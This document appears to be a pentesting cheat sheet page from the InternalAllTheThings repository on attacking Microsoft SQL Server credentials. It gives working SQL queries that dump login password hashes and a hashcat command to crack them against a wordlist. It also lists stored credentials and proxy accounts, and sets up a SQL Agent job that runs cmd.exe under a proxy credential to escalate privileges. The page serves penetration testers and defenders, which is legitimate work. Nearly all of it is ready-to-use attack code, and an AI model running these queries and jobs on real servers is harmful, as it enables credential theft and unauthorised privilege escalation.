mssql-credentials.md (4100B)
1 --- 2 title: "MSSQL - Credentials" 3 section: "Databases" 4 sectionSlug: "databases" 5 sourcePath: "docs/databases/mssql-credentials.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/databases/mssql-credentials.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # MSSQL - Credentials 12 13 ## Summary 14 15 * [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes) 16 * [List Credentials on the SQL Server](#list-credentials-on-the-sql-server) 17 * [Proxy Account Context](#proxy-account-context) 18 19 ## MSSQL Accounts and Hashes 20 21 * MSSQL 2000 22 23 ```sql 24 SELECT name, password FROM master..sysxlogins 25 SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins 26 -- (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) 27 ``` 28 29 * MSSQL 2005 30 31 ```sql 32 SELECT name, password_hash FROM master.sys.sql_logins 33 SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins 34 ``` 35 36 Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force` 37 38 | Hash-Mode | Hash-Name | Example | 39 | --------- | ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------- | 40 | 131 | MSSQL (2000) | 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578 | 41 | 132 | MSSQL (2005) | 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe | 42 | 1731 | MSSQL (2012, 2014) | 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375 | 43 44 ## List Credentials on the SQL Server 45 46 * List credentials configured on the SQL Server instance 47 48 ```sql 49 SELECT * FROM sys.credentials 50 ``` 51 52 * List proxy accounts 53 54 ```sql 55 USE msdb; 56 GO 57 58 SELECT 59 proxy_id, 60 name AS proxy_name, 61 credential_id, 62 enabled 63 FROM 64 dbo.sysproxies; 65 GO 66 ``` 67 68 * [dataplat/dbatools/Get-DecryptedObject.ps1](https://github.com/dataplat/dbatools/blob/7ad0415c2f8a58d3472c1e85ee431c70f1bb8ae4/private/functions/Get-DecryptedObject.ps1) 69 70 ## Proxy Account Context 71 72 Agent Job using the registered proxy credential. 73 74 ```sql 75 USE msdb; 76 GO 77 78 -- Create the job 79 EXEC sp_add_job 80 @job_name = N'WhoAmIJob'; -- Name of the job 81 82 -- Add a job step that uses the proxy to execute the whoami command 83 EXEC sp_add_jobstep 84 @job_name = N'WhoAmIJob', 85 @step_name = N'ExecuteWhoAmI', 86 @subsystem = N'CmdExec', 87 @command = N'c:\windows\system32\cmd.exe /c whoami > c:\windows\temp\whoami.txt', 88 @on_success_action = 1, -- 1 = Quit with success 89 @on_fail_action = 2, -- 2 = Quit with failure 90 @proxy_name = N'MyCredentialProxy'; -- The proxy created earlier 91 92 -- Add a schedule to the job (optional, can be manual or scheduled) 93 EXEC sp_add_jobschedule 94 @job_name = N'WhoAmIJob', 95 @name = N'RunOnce', 96 @freq_type = 1, -- 1 = Once 97 @active_start_date = 20240820, 98 @active_start_time = 120000; 99 100 -- Add the job to the SQL Server Agent 101 EXEC sp_add_jobserver 102 @job_name = N'WhoAmIJob', 103 @server_name = N'(LOCAL)'; 104 ``` 105 106 Execute the Agent job so that a process will be started in the context of the proxy account and execute your code/command. 107 `EXEC sp_start_job @job_name = N'WhoAmIJob';` 108 109 ## References 110 111 * [Hijacking SQL Server Credentials using Agent Jobs for Domain Privilege Escalation - Scott Sutherland - September 10, 2024](https://www.netspi.com/blog/technical-blog/network-pentesting/hijacking-sql-server-credentials-with-agent-jobs-for-domain-privilege-escalation/)